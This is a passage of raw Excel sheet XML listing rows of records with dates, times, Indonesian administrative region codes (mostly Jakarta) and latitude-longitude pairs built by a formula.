        <v>26</v>
      </c>
      <c r="I3753" t="s">
        <v>65</v>
      </c>
      <c r="J3753" t="s">
        <v>12418</v>
      </c>
      <c r="L3753" t="s">
        <v>12419</v>
      </c>
      <c r="M3753">
        <v>3173010007</v>
      </c>
      <c r="N3753">
        <v>3173010</v>
      </c>
      <c r="O3753">
        <v>3173</v>
      </c>
      <c r="P3753">
        <v>31</v>
      </c>
      <c r="Q3753" t="s">
        <v>1510</v>
      </c>
      <c r="R3753" t="s">
        <v>1481</v>
      </c>
      <c r="S3753" t="s">
        <v>62</v>
      </c>
      <c r="T3753" t="s">
        <v>33</v>
      </c>
      <c r="U3753" s="5">
        <v>10681792</v>
      </c>
      <c r="V3753" s="5" t="s">
        <v>17825</v>
      </c>
      <c r="W3753" s="5">
        <v>-618316</v>
      </c>
      <c r="X3753" t="s">
        <v>19799</v>
      </c>
      <c r="Y3753" t="str">
        <f t="shared" si="58"/>
        <v>-6.18316,106.81792</v>
      </c>
    </row>
    <row r="3754" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3754">
        <v>290662</v>
      </c>
      <c r="B3754" s="1">
        <v>44333</v>
      </c>
      <c r="C3754" s="2">
        <v>0.62777777777777777</v>
      </c>
      <c r="D3754" t="s">
        <v>2648</v>
      </c>
      <c r="E3754" t="s">
        <v>23</v>
      </c>
      <c r="G3754" t="s">
        <v>12420</v>
      </c>
      <c r="H3754" t="s">
        <v>26</v>
      </c>
      <c r="J3754" t="s">
        <v>5171</v>
      </c>
      <c r="L3754" t="s">
        <v>12421</v>
      </c>
      <c r="M3754">
        <v>3175010004</v>
      </c>
      <c r="N3754">
        <v>3175010</v>
      </c>
      <c r="O3754">
        <v>3175</v>
      </c>
      <c r="P3754">
        <v>31</v>
      </c>
      <c r="Q3754" t="s">
        <v>546</v>
      </c>
      <c r="R3754" t="s">
        <v>546</v>
      </c>
      <c r="S3754" t="s">
        <v>547</v>
      </c>
      <c r="T3754" t="s">
        <v>33</v>
      </c>
      <c r="U3754" s="5">
        <v>10679761</v>
      </c>
      <c r="V3754" s="5" t="s">
        <v>17826</v>
      </c>
      <c r="W3754" s="5">
        <v>-610938</v>
      </c>
      <c r="X3754" t="s">
        <v>21563</v>
      </c>
      <c r="Y3754" t="str">
        <f t="shared" si="58"/>
        <v>-6.10938,106.79761</v>
      </c>
    </row>
    <row r="3755" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3755">
        <v>290663</v>
      </c>
      <c r="B3755" s="1">
        <v>44333</v>
      </c>
      <c r="C3755" s="2">
        <v>0.62638888888888888</v>
      </c>
      <c r="D3755" t="s">
        <v>2648</v>
      </c>
      <c r="E3755" t="s">
        <v>23</v>
      </c>
      <c r="G3755" t="s">
        <v>12422</v>
      </c>
      <c r="H3755" t="s">
        <v>26</v>
      </c>
      <c r="J3755" t="s">
        <v>5171</v>
      </c>
      <c r="L3755" t="s">
        <v>12423</v>
      </c>
      <c r="M3755">
        <v>3175010004</v>
      </c>
      <c r="N3755">
        <v>3175010</v>
      </c>
      <c r="O3755">
        <v>3175</v>
      </c>
      <c r="P3755">
        <v>31</v>
      </c>
      <c r="Q3755" t="s">
        <v>546</v>
      </c>
      <c r="R3755" t="s">
        <v>546</v>
      </c>
      <c r="S3755" t="s">
        <v>547</v>
      </c>
      <c r="T3755" t="s">
        <v>33</v>
      </c>
      <c r="U3755" s="5">
        <v>10679759</v>
      </c>
      <c r="V3755" s="5" t="s">
        <v>17827</v>
      </c>
      <c r="W3755" s="5">
        <v>-610940</v>
      </c>
      <c r="X3755" t="s">
        <v>21564</v>
      </c>
      <c r="Y3755" t="str">
        <f t="shared" si="58"/>
        <v>-6.10940,106.79759</v>
      </c>
    </row>
    <row r="3756" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3756">
        <v>290710</v>
      </c>
      <c r="B3756" s="1">
        <v>44333</v>
      </c>
      <c r="C3756" s="2">
        <v>0.70665509259259263</v>
      </c>
      <c r="D3756" t="s">
        <v>22</v>
      </c>
      <c r="E3756" t="s">
        <v>23</v>
      </c>
      <c r="F3756" t="s">
        <v>12424</v>
      </c>
      <c r="G3756" t="s">
        <v>12425</v>
      </c>
      <c r="H3756" t="s">
        <v>26</v>
      </c>
      <c r="I3756" t="s">
        <v>1604</v>
      </c>
      <c r="J3756" t="s">
        <v>8097</v>
      </c>
      <c r="L3756" t="s">
        <v>12426</v>
      </c>
      <c r="M3756">
        <v>3171040003</v>
      </c>
      <c r="N3756">
        <v>3171040</v>
      </c>
      <c r="O3756">
        <v>3171</v>
      </c>
      <c r="P3756">
        <v>31</v>
      </c>
      <c r="Q3756" t="s">
        <v>411</v>
      </c>
      <c r="R3756" t="s">
        <v>163</v>
      </c>
      <c r="S3756" t="s">
        <v>108</v>
      </c>
      <c r="T3756" t="s">
        <v>33</v>
      </c>
      <c r="U3756" s="5">
        <v>10676034</v>
      </c>
      <c r="V3756" s="5" t="s">
        <v>17828</v>
      </c>
      <c r="W3756" s="5">
        <v>-624011</v>
      </c>
      <c r="X3756" t="s">
        <v>21565</v>
      </c>
      <c r="Y3756" t="str">
        <f t="shared" si="58"/>
        <v>-6.24011,106.76034</v>
      </c>
    </row>
    <row r="3757" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3757">
        <v>290731</v>
      </c>
      <c r="B3757" s="1">
        <v>44333</v>
      </c>
      <c r="C3757" s="2">
        <v>0.74056712962962967</v>
      </c>
      <c r="D3757" t="s">
        <v>22</v>
      </c>
      <c r="E3757" t="s">
        <v>23</v>
      </c>
      <c r="F3757" t="s">
        <v>12427</v>
      </c>
      <c r="G3757" t="s">
        <v>12428</v>
      </c>
      <c r="H3757" t="s">
        <v>26</v>
      </c>
      <c r="I3757" t="s">
        <v>517</v>
      </c>
      <c r="J3757" t="s">
        <v>12429</v>
      </c>
      <c r="L3757" t="s">
        <v>12430</v>
      </c>
      <c r="M3757">
        <v>3171040003</v>
      </c>
      <c r="N3757">
        <v>3171040</v>
      </c>
      <c r="O3757">
        <v>3171</v>
      </c>
      <c r="P3757">
        <v>31</v>
      </c>
      <c r="Q3757" t="s">
        <v>411</v>
      </c>
      <c r="R3757" t="s">
        <v>163</v>
      </c>
      <c r="S3757" t="s">
        <v>108</v>
      </c>
      <c r="T3757" t="s">
        <v>33</v>
      </c>
      <c r="U3757" s="5">
        <v>10675899</v>
      </c>
      <c r="V3757" s="5" t="s">
        <v>17829</v>
      </c>
      <c r="W3757" s="5">
        <v>-622664</v>
      </c>
      <c r="X3757" t="s">
        <v>21566</v>
      </c>
      <c r="Y3757" t="str">
        <f t="shared" si="58"/>
        <v>-6.22664,106.75899</v>
      </c>
    </row>
    <row r="3758" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3758">
        <v>290779</v>
      </c>
      <c r="B3758" s="1">
        <v>44333</v>
      </c>
      <c r="C3758" s="2">
        <v>0.81597222222222221</v>
      </c>
      <c r="D3758" t="s">
        <v>2648</v>
      </c>
      <c r="E3758" t="s">
        <v>23</v>
      </c>
      <c r="G3758" t="s">
        <v>12431</v>
      </c>
      <c r="H3758" t="s">
        <v>26</v>
      </c>
      <c r="J3758" t="s">
        <v>5171</v>
      </c>
      <c r="L3758" t="s">
        <v>12432</v>
      </c>
      <c r="M3758">
        <v>3175010004</v>
      </c>
      <c r="N3758">
        <v>3175010</v>
      </c>
      <c r="O3758">
        <v>3175</v>
      </c>
      <c r="P3758">
        <v>31</v>
      </c>
      <c r="Q3758" t="s">
        <v>546</v>
      </c>
      <c r="R3758" t="s">
        <v>546</v>
      </c>
      <c r="S3758" t="s">
        <v>547</v>
      </c>
      <c r="T3758" t="s">
        <v>33</v>
      </c>
      <c r="U3758" s="5">
        <v>10680585</v>
      </c>
      <c r="V3758" s="5" t="s">
        <v>17830</v>
      </c>
      <c r="W3758" s="5">
        <v>-611821</v>
      </c>
      <c r="X3758" t="s">
        <v>21567</v>
      </c>
      <c r="Y3758" t="str">
        <f t="shared" si="58"/>
        <v>-6.11821,106.80585</v>
      </c>
    </row>
    <row r="3759" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3759">
        <v>290781</v>
      </c>
      <c r="B3759" s="1">
        <v>44333</v>
      </c>
      <c r="C3759" s="2">
        <v>0.81666666666666676</v>
      </c>
      <c r="D3759" t="s">
        <v>2648</v>
      </c>
      <c r="E3759" t="s">
        <v>23</v>
      </c>
      <c r="G3759" t="s">
        <v>12433</v>
      </c>
      <c r="H3759" t="s">
        <v>26</v>
      </c>
      <c r="J3759" t="s">
        <v>5171</v>
      </c>
      <c r="L3759" t="s">
        <v>12434</v>
      </c>
      <c r="M3759">
        <v>3175010004</v>
      </c>
      <c r="N3759">
        <v>3175010</v>
      </c>
      <c r="O3759">
        <v>3175</v>
      </c>
      <c r="P3759">
        <v>31</v>
      </c>
      <c r="Q3759" t="s">
        <v>546</v>
      </c>
      <c r="R3759" t="s">
        <v>546</v>
      </c>
      <c r="S3759" t="s">
        <v>547</v>
      </c>
      <c r="T3759" t="s">
        <v>33</v>
      </c>
      <c r="U3759" s="5">
        <v>10680601</v>
      </c>
      <c r="V3759" s="5" t="s">
        <v>17831</v>
      </c>
      <c r="W3759" s="5">
        <v>-611824</v>
      </c>
      <c r="X3759" t="s">
        <v>21568</v>
      </c>
      <c r="Y3759" t="str">
        <f t="shared" si="58"/>
        <v>-6.11824,106.80601</v>
      </c>
    </row>
    <row r="3760" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3760">
        <v>290795</v>
      </c>
      <c r="B3760" s="1">
        <v>44333</v>
      </c>
      <c r="C3760" s="2">
        <v>0.82708333333333339</v>
      </c>
      <c r="D3760" t="s">
        <v>2648</v>
      </c>
      <c r="E3760" t="s">
        <v>23</v>
      </c>
      <c r="G3760" t="s">
        <v>12435</v>
      </c>
      <c r="H3760" t="s">
        <v>26</v>
      </c>
      <c r="J3760" t="s">
        <v>12436</v>
      </c>
      <c r="L3760" t="s">
        <v>2766</v>
      </c>
      <c r="M3760">
        <v>3175030007</v>
      </c>
      <c r="N3760">
        <v>3175030</v>
      </c>
      <c r="O3760">
        <v>3175</v>
      </c>
      <c r="P3760">
        <v>31</v>
      </c>
      <c r="Q3760" t="s">
        <v>1562</v>
      </c>
      <c r="R3760" t="s">
        <v>1563</v>
      </c>
      <c r="S3760" t="s">
        <v>547</v>
      </c>
      <c r="T3760" t="s">
        <v>33</v>
      </c>
      <c r="U3760" s="5">
        <v>10688052</v>
      </c>
      <c r="V3760" s="5" t="s">
        <v>17832</v>
      </c>
      <c r="W3760" s="5">
        <v>-610996</v>
      </c>
      <c r="X3760" t="s">
        <v>21569</v>
      </c>
      <c r="Y3760" t="str">
        <f t="shared" si="58"/>
        <v>-6.10996,106.88052</v>
      </c>
    </row>
    <row r="3761" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3761">
        <v>292828</v>
      </c>
      <c r="B3761" s="1">
        <v>44335</v>
      </c>
      <c r="C3761" s="2">
        <v>0.23497685185185188</v>
      </c>
      <c r="D3761" t="s">
        <v>22</v>
      </c>
      <c r="E3761" t="s">
        <v>23</v>
      </c>
      <c r="F3761" t="s">
        <v>12437</v>
      </c>
      <c r="G3761" t="s">
        <v>12438</v>
      </c>
      <c r="H3761" t="s">
        <v>26</v>
      </c>
      <c r="I3761" t="s">
        <v>1080</v>
      </c>
      <c r="J3761" t="s">
        <v>7171</v>
      </c>
      <c r="L3761" t="s">
        <v>12439</v>
      </c>
      <c r="M3761">
        <v>6404022001</v>
      </c>
      <c r="N3761">
        <v>6404022</v>
      </c>
      <c r="O3761">
        <v>6404</v>
      </c>
      <c r="P3761">
        <v>64</v>
      </c>
      <c r="Q3761" t="s">
        <v>12216</v>
      </c>
      <c r="R3761" t="s">
        <v>12440</v>
      </c>
      <c r="S3761" t="s">
        <v>9302</v>
      </c>
      <c r="T3761" t="s">
        <v>1308</v>
      </c>
      <c r="U3761" s="5">
        <v>11684757</v>
      </c>
      <c r="V3761" s="5" t="s">
        <v>17833</v>
      </c>
      <c r="W3761" s="5">
        <v>104399</v>
      </c>
      <c r="X3761" t="s">
        <v>21570</v>
      </c>
      <c r="Y3761" t="str">
        <f t="shared" si="58"/>
        <v>1.04399,116.84757</v>
      </c>
    </row>
    <row r="3762" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3762">
        <v>292904</v>
      </c>
      <c r="B3762" s="1">
        <v>44335</v>
      </c>
      <c r="C3762" s="2">
        <v>0.65451388888888895</v>
      </c>
      <c r="D3762" t="s">
        <v>22</v>
      </c>
      <c r="E3762" t="s">
        <v>23</v>
      </c>
      <c r="F3762" t="s">
        <v>12441</v>
      </c>
      <c r="G3762" t="s">
        <v>12442</v>
      </c>
      <c r="H3762" t="s">
        <v>7086</v>
      </c>
      <c r="I3762" t="s">
        <v>7499</v>
      </c>
      <c r="J3762" t="s">
        <v>1656</v>
      </c>
      <c r="M3762">
        <v>3173080003</v>
      </c>
      <c r="N3762">
        <v>3173080</v>
      </c>
      <c r="O3762">
        <v>3173</v>
      </c>
      <c r="P3762">
        <v>31</v>
      </c>
      <c r="Q3762" t="s">
        <v>157</v>
      </c>
      <c r="R3762" t="s">
        <v>157</v>
      </c>
      <c r="S3762" t="s">
        <v>62</v>
      </c>
      <c r="T3762" t="s">
        <v>33</v>
      </c>
      <c r="U3762" s="5">
        <v>10682727</v>
      </c>
      <c r="V3762" s="5" t="s">
        <v>17834</v>
      </c>
      <c r="W3762" s="5">
        <v>-617540</v>
      </c>
      <c r="X3762" t="s">
        <v>21571</v>
      </c>
      <c r="Y3762" t="str">
        <f t="shared" si="58"/>
        <v>-6.17540,106.82727</v>
      </c>
    </row>
    <row r="3763" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3763">
        <v>292905</v>
      </c>
      <c r="B3763" s="1">
        <v>44336</v>
      </c>
      <c r="C3763" s="2">
        <v>0.19722222222222222</v>
      </c>
      <c r="D3763" t="s">
        <v>2648</v>
      </c>
      <c r="E3763" t="s">
        <v>23</v>
      </c>
      <c r="G3763" t="s">
        <v>12443</v>
      </c>
      <c r="H3763" t="s">
        <v>26</v>
      </c>
      <c r="J3763" t="s">
        <v>12444</v>
      </c>
      <c r="L3763" t="s">
        <v>12445</v>
      </c>
      <c r="M3763">
        <v>3174080003</v>
      </c>
      <c r="N3763">
        <v>3174080</v>
      </c>
      <c r="O3763">
        <v>3174</v>
      </c>
      <c r="P3763">
        <v>31</v>
      </c>
      <c r="Q3763" t="s">
        <v>1700</v>
      </c>
      <c r="R3763" t="s">
        <v>695</v>
      </c>
      <c r="S3763" t="s">
        <v>32</v>
      </c>
      <c r="T3763" t="s">
        <v>33</v>
      </c>
      <c r="U3763" s="5">
        <v>10671222</v>
      </c>
      <c r="V3763" s="5" t="s">
        <v>17835</v>
      </c>
      <c r="W3763" s="5">
        <v>-614541</v>
      </c>
      <c r="X3763" t="s">
        <v>21572</v>
      </c>
      <c r="Y3763" t="str">
        <f t="shared" si="58"/>
        <v>-6.14541,106.71222</v>
      </c>
    </row>
    <row r="3764" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3764">
        <v>292910</v>
      </c>
      <c r="B3764" s="1">
        <v>44337</v>
      </c>
      <c r="C3764" s="2">
        <v>0.63064814814814818</v>
      </c>
      <c r="D3764" t="s">
        <v>22</v>
      </c>
      <c r="E3764" t="s">
        <v>23</v>
      </c>
      <c r="F3764" t="s">
        <v>12446</v>
      </c>
      <c r="G3764" t="s">
        <v>12447</v>
      </c>
      <c r="H3764" t="s">
        <v>26</v>
      </c>
      <c r="I3764" t="s">
        <v>197</v>
      </c>
      <c r="J3764" t="s">
        <v>4142</v>
      </c>
      <c r="L3764" t="s">
        <v>12448</v>
      </c>
      <c r="M3764">
        <v>3171040004</v>
      </c>
      <c r="N3764">
        <v>3171040</v>
      </c>
      <c r="O3764">
        <v>3171</v>
      </c>
      <c r="P3764">
        <v>31</v>
      </c>
      <c r="Q3764" t="s">
        <v>4144</v>
      </c>
      <c r="R3764" t="s">
        <v>163</v>
      </c>
      <c r="S3764" t="s">
        <v>108</v>
      </c>
      <c r="T3764" t="s">
        <v>33</v>
      </c>
      <c r="U3764" s="5">
        <v>10675980</v>
      </c>
      <c r="V3764" s="5" t="s">
        <v>17836</v>
      </c>
      <c r="W3764" s="5">
        <v>-623882</v>
      </c>
      <c r="X3764" t="s">
        <v>21573</v>
      </c>
      <c r="Y3764" t="str">
        <f t="shared" si="58"/>
        <v>-6.23882,106.75980</v>
      </c>
    </row>
    <row r="3765" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3765">
        <v>292911</v>
      </c>
      <c r="B3765" s="1">
        <v>44338</v>
      </c>
      <c r="C3765" s="2">
        <v>0.50486111111111109</v>
      </c>
      <c r="D3765" t="s">
        <v>2648</v>
      </c>
      <c r="E3765" t="s">
        <v>23</v>
      </c>
      <c r="G3765" t="s">
        <v>12449</v>
      </c>
      <c r="H3765" t="s">
        <v>26</v>
      </c>
      <c r="J3765" t="s">
        <v>8654</v>
      </c>
      <c r="L3765" t="s">
        <v>12450</v>
      </c>
      <c r="M3765">
        <v>3174010003</v>
      </c>
      <c r="N3765">
        <v>3174010</v>
      </c>
      <c r="O3765">
        <v>3174</v>
      </c>
      <c r="P3765">
        <v>31</v>
      </c>
      <c r="Q3765" t="s">
        <v>5732</v>
      </c>
      <c r="R3765" t="s">
        <v>69</v>
      </c>
      <c r="S3765" t="s">
        <v>32</v>
      </c>
      <c r="T3765" t="s">
        <v>33</v>
      </c>
      <c r="U3765" s="5">
        <v>10672570</v>
      </c>
      <c r="V3765" s="5" t="s">
        <v>17837</v>
      </c>
      <c r="W3765" s="5">
        <v>-621201</v>
      </c>
      <c r="X3765" t="s">
        <v>21574</v>
      </c>
      <c r="Y3765" t="str">
        <f t="shared" si="58"/>
        <v>-6.21201,106.72570</v>
      </c>
    </row>
    <row r="3766" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3766">
        <v>293160</v>
      </c>
      <c r="B3766" s="1">
        <v>44339</v>
      </c>
      <c r="C3766" s="2">
        <v>0.36222222222222222</v>
      </c>
      <c r="D3766" t="s">
        <v>22</v>
      </c>
      <c r="E3766" t="s">
        <v>23</v>
      </c>
      <c r="F3766" t="s">
        <v>12451</v>
      </c>
      <c r="H3766" t="s">
        <v>7086</v>
      </c>
      <c r="I3766" t="s">
        <v>11822</v>
      </c>
      <c r="J3766" t="s">
        <v>2622</v>
      </c>
      <c r="L3766" t="s">
        <v>12452</v>
      </c>
      <c r="M3766">
        <v>3516040002</v>
      </c>
      <c r="N3766">
        <v>3516040</v>
      </c>
      <c r="O3766">
        <v>3516</v>
      </c>
      <c r="P3766">
        <v>35</v>
      </c>
      <c r="Q3766" t="s">
        <v>12453</v>
      </c>
      <c r="R3766" t="s">
        <v>12453</v>
      </c>
      <c r="S3766" t="s">
        <v>8728</v>
      </c>
      <c r="T3766" t="s">
        <v>1221</v>
      </c>
      <c r="U3766" s="5">
        <v>11258802</v>
      </c>
      <c r="V3766" s="5" t="s">
        <v>17838</v>
      </c>
      <c r="W3766" s="5">
        <v>-766489</v>
      </c>
      <c r="X3766" t="s">
        <v>21575</v>
      </c>
      <c r="Y3766" t="str">
        <f t="shared" si="58"/>
        <v>-7.66489,112.58802</v>
      </c>
    </row>
    <row r="3767" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3767">
        <v>293349</v>
      </c>
      <c r="B3767" s="1">
        <v>44340</v>
      </c>
      <c r="C3767" s="2">
        <v>0.65763888888888888</v>
      </c>
      <c r="D3767" t="s">
        <v>2648</v>
      </c>
      <c r="E3767" t="s">
        <v>23</v>
      </c>
      <c r="G3767" t="s">
        <v>12454</v>
      </c>
      <c r="H3767" t="s">
        <v>26</v>
      </c>
      <c r="J3767" t="s">
        <v>404</v>
      </c>
      <c r="L3767" t="s">
        <v>12455</v>
      </c>
      <c r="M3767">
        <v>3174020005</v>
      </c>
      <c r="N3767">
        <v>3174020</v>
      </c>
      <c r="O3767">
        <v>3174</v>
      </c>
      <c r="P3767">
        <v>31</v>
      </c>
      <c r="Q3767" t="s">
        <v>30</v>
      </c>
      <c r="R3767" t="s">
        <v>31</v>
      </c>
      <c r="S3767" t="s">
        <v>32</v>
      </c>
      <c r="T3767" t="s">
        <v>33</v>
      </c>
      <c r="U3767" s="5">
        <v>10676925</v>
      </c>
      <c r="V3767" s="5" t="s">
        <v>17839</v>
      </c>
      <c r="W3767" s="5">
        <v>-616611</v>
      </c>
      <c r="X3767" t="s">
        <v>18563</v>
      </c>
      <c r="Y3767" t="str">
        <f t="shared" si="58"/>
        <v>-6.16611,106.76925</v>
      </c>
    </row>
    <row r="3768" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3768">
        <v>293352</v>
      </c>
      <c r="B3768" s="1">
        <v>44340</v>
      </c>
      <c r="C3768" s="2">
        <v>0.66905092592592597</v>
      </c>
      <c r="D3768" t="s">
        <v>22</v>
      </c>
      <c r="E3768" t="s">
        <v>23</v>
      </c>
      <c r="F3768" t="s">
        <v>12456</v>
      </c>
      <c r="G3768" t="s">
        <v>12457</v>
      </c>
      <c r="H3768" t="s">
        <v>26</v>
      </c>
      <c r="I3768" t="s">
        <v>945</v>
      </c>
      <c r="J3768" t="s">
        <v>10544</v>
      </c>
      <c r="L3768" t="s">
        <v>12458</v>
      </c>
      <c r="M3768">
        <v>3171020005</v>
      </c>
      <c r="N3768">
        <v>3171020</v>
      </c>
      <c r="O3768">
        <v>3171</v>
      </c>
      <c r="P3768">
        <v>31</v>
      </c>
      <c r="Q3768" t="s">
        <v>483</v>
      </c>
      <c r="R3768" t="s">
        <v>484</v>
      </c>
      <c r="S3768" t="s">
        <v>108</v>
      </c>
      <c r="T3768" t="s">
        <v>33</v>
      </c>
      <c r="U3768" s="5">
        <v>10682722</v>
      </c>
      <c r="V3768" s="5" t="s">
        <v>16429</v>
      </c>
      <c r="W3768" s="5">
        <v>-628920</v>
      </c>
      <c r="X3768" t="s">
        <v>21576</v>
      </c>
      <c r="Y3768" t="str">
        <f t="shared" si="58"/>
        <v>-6.28920,106.82722</v>
      </c>
    </row>
    <row r="3769" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3769">
        <v>293359</v>
      </c>
      <c r="B3769" s="1">
        <v>44340</v>
      </c>
      <c r="C3769" s="2">
        <v>0.68680555555555556</v>
      </c>
      <c r="D3769" t="s">
        <v>2648</v>
      </c>
      <c r="E3769" t="s">
        <v>23</v>
      </c>
      <c r="G3769" t="s">
        <v>12459</v>
      </c>
      <c r="H3769" t="s">
        <v>26</v>
      </c>
      <c r="J3769" t="s">
        <v>2580</v>
      </c>
      <c r="L3769" t="s">
        <v>12460</v>
      </c>
      <c r="M3769">
        <v>3172040005</v>
      </c>
      <c r="N3769">
        <v>3172040</v>
      </c>
      <c r="O3769">
        <v>3172</v>
      </c>
      <c r="P3769">
        <v>31</v>
      </c>
      <c r="Q3769" t="s">
        <v>1351</v>
      </c>
      <c r="R3769" t="s">
        <v>281</v>
      </c>
      <c r="S3769" t="s">
        <v>49</v>
      </c>
      <c r="T3769" t="s">
        <v>33</v>
      </c>
      <c r="U3769" s="5">
        <v>10689385</v>
      </c>
      <c r="V3769" s="5" t="s">
        <v>17840</v>
      </c>
      <c r="W3769" s="5">
        <v>-624118</v>
      </c>
      <c r="X3769" t="s">
        <v>18408</v>
      </c>
      <c r="Y3769" t="str">
        <f t="shared" si="58"/>
        <v>-6.24118,106.89385</v>
      </c>
    </row>
    <row r="3770" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3770">
        <v>293374</v>
      </c>
      <c r="B3770" s="1">
        <v>44340</v>
      </c>
      <c r="C3770" s="2">
        <v>0.71388888888888891</v>
      </c>
      <c r="D3770" t="s">
        <v>2648</v>
      </c>
      <c r="E3770" t="s">
        <v>23</v>
      </c>
      <c r="G3770" t="s">
        <v>12461</v>
      </c>
      <c r="H3770" t="s">
        <v>26</v>
      </c>
      <c r="J3770" t="s">
        <v>563</v>
      </c>
      <c r="L3770" t="s">
        <v>12462</v>
      </c>
      <c r="M3770">
        <v>3174010005</v>
      </c>
      <c r="N3770">
        <v>3174010</v>
      </c>
      <c r="O3770">
        <v>3174</v>
      </c>
      <c r="P3770">
        <v>31</v>
      </c>
      <c r="Q3770" t="s">
        <v>251</v>
      </c>
      <c r="R3770" t="s">
        <v>69</v>
      </c>
      <c r="S3770" t="s">
        <v>32</v>
      </c>
      <c r="T3770" t="s">
        <v>33</v>
      </c>
      <c r="U3770" s="5">
        <v>10675684</v>
      </c>
      <c r="V3770" s="5" t="s">
        <v>17841</v>
      </c>
      <c r="W3770" s="5">
        <v>-618714</v>
      </c>
      <c r="X3770" t="s">
        <v>21577</v>
      </c>
      <c r="Y3770" t="str">
        <f t="shared" si="58"/>
        <v>-6.18714,106.75684</v>
      </c>
    </row>
    <row r="3771" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3771">
        <v>293598</v>
      </c>
      <c r="B3771" s="1">
        <v>44340</v>
      </c>
      <c r="C3771" s="2">
        <v>0.59791666666666665</v>
      </c>
      <c r="D3771" t="s">
        <v>2648</v>
      </c>
      <c r="E3771" t="s">
        <v>23</v>
      </c>
      <c r="G3771" t="s">
        <v>12463</v>
      </c>
      <c r="H3771" t="s">
        <v>26</v>
      </c>
      <c r="J3771" t="s">
        <v>9569</v>
      </c>
      <c r="L3771" t="s">
        <v>12464</v>
      </c>
      <c r="M3771">
        <v>3175040003</v>
      </c>
      <c r="N3771">
        <v>3175040</v>
      </c>
      <c r="O3771">
        <v>3175</v>
      </c>
      <c r="P3771">
        <v>31</v>
      </c>
      <c r="Q3771" t="s">
        <v>2062</v>
      </c>
      <c r="R3771" t="s">
        <v>2063</v>
      </c>
      <c r="S3771" t="s">
        <v>547</v>
      </c>
      <c r="T3771" t="s">
        <v>33</v>
      </c>
      <c r="U3771" s="5">
        <v>10691074</v>
      </c>
      <c r="V3771" s="5" t="s">
        <v>17842</v>
      </c>
      <c r="W3771" s="5">
        <v>-611952</v>
      </c>
      <c r="X3771" t="s">
        <v>21578</v>
      </c>
      <c r="Y3771" t="str">
        <f t="shared" si="58"/>
        <v>-6.11952,106.91074</v>
      </c>
    </row>
    <row r="3772" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3772">
        <v>293599</v>
      </c>
      <c r="B3772" s="1">
        <v>44340</v>
      </c>
      <c r="C3772" s="2">
        <v>0.60972222222222217</v>
      </c>
      <c r="D3772" t="s">
        <v>2648</v>
      </c>
      <c r="E3772" t="s">
        <v>23</v>
      </c>
      <c r="G3772" t="s">
        <v>12465</v>
      </c>
      <c r="H3772" t="s">
        <v>26</v>
      </c>
      <c r="J3772" t="s">
        <v>8233</v>
      </c>
      <c r="L3772" t="s">
        <v>12466</v>
      </c>
      <c r="M3772">
        <v>3172020005</v>
      </c>
      <c r="N3772">
        <v>3172020</v>
      </c>
      <c r="O3772">
        <v>3172</v>
      </c>
      <c r="P3772">
        <v>31</v>
      </c>
      <c r="Q3772" t="s">
        <v>3744</v>
      </c>
      <c r="R3772" t="s">
        <v>1644</v>
      </c>
      <c r="S3772" t="s">
        <v>49</v>
      </c>
      <c r="T3772" t="s">
        <v>33</v>
      </c>
      <c r="U3772" s="5">
        <v>10687440</v>
      </c>
      <c r="V3772" s="5" t="s">
        <v>17843</v>
      </c>
      <c r="W3772" s="5">
        <v>-630215</v>
      </c>
      <c r="X3772" t="s">
        <v>21579</v>
      </c>
      <c r="Y3772" t="str">
        <f t="shared" si="58"/>
        <v>-6.30215,106.87440</v>
      </c>
    </row>
    <row r="3773" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3773">
        <v>293601</v>
      </c>
      <c r="B3773" s="1">
        <v>44340</v>
      </c>
      <c r="C3773" s="2">
        <v>0.56527777777777777</v>
      </c>
      <c r="D3773" t="s">
        <v>2648</v>
      </c>
      <c r="E3773" t="s">
        <v>23</v>
      </c>
      <c r="G3773" t="s">
        <v>12467</v>
      </c>
      <c r="H3773" t="s">
        <v>26</v>
      </c>
      <c r="J3773" t="s">
        <v>12468</v>
      </c>
      <c r="L3773" t="s">
        <v>12469</v>
      </c>
      <c r="M3773">
        <v>3172090003</v>
      </c>
      <c r="N3773">
        <v>3172090</v>
      </c>
      <c r="O3773">
        <v>3172</v>
      </c>
      <c r="P3773">
        <v>31</v>
      </c>
      <c r="Q3773" t="s">
        <v>10227</v>
      </c>
      <c r="R3773" t="s">
        <v>890</v>
      </c>
      <c r="S3773" t="s">
        <v>49</v>
      </c>
      <c r="T3773" t="s">
        <v>33</v>
      </c>
      <c r="U3773" s="5">
        <v>10690563</v>
      </c>
      <c r="V3773" s="5" t="s">
        <v>17844</v>
      </c>
      <c r="W3773" s="5">
        <v>-619236</v>
      </c>
      <c r="X3773" t="s">
        <v>18975</v>
      </c>
      <c r="Y3773" t="str">
        <f t="shared" si="58"/>
        <v>-6.19236,106.90563</v>
      </c>
    </row>
    <row r="3774" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3774">
        <v>293602</v>
      </c>
      <c r="B3774" s="1">
        <v>44340</v>
      </c>
      <c r="C3774" s="2">
        <v>0.58124999999999993</v>
      </c>
      <c r="D3774" t="s">
        <v>2648</v>
      </c>
      <c r="E3774" t="s">
        <v>23</v>
      </c>
      <c r="G3774" t="s">
        <v>12470</v>
      </c>
      <c r="H3774" t="s">
        <v>26</v>
      </c>
      <c r="J3774" t="s">
        <v>593</v>
      </c>
      <c r="L3774" t="s">
        <v>12471</v>
      </c>
      <c r="M3774">
        <v>3174070006</v>
      </c>
      <c r="N3774">
        <v>3174070</v>
      </c>
      <c r="O3774">
        <v>3174</v>
      </c>
      <c r="P3774">
        <v>31</v>
      </c>
      <c r="Q3774" t="s">
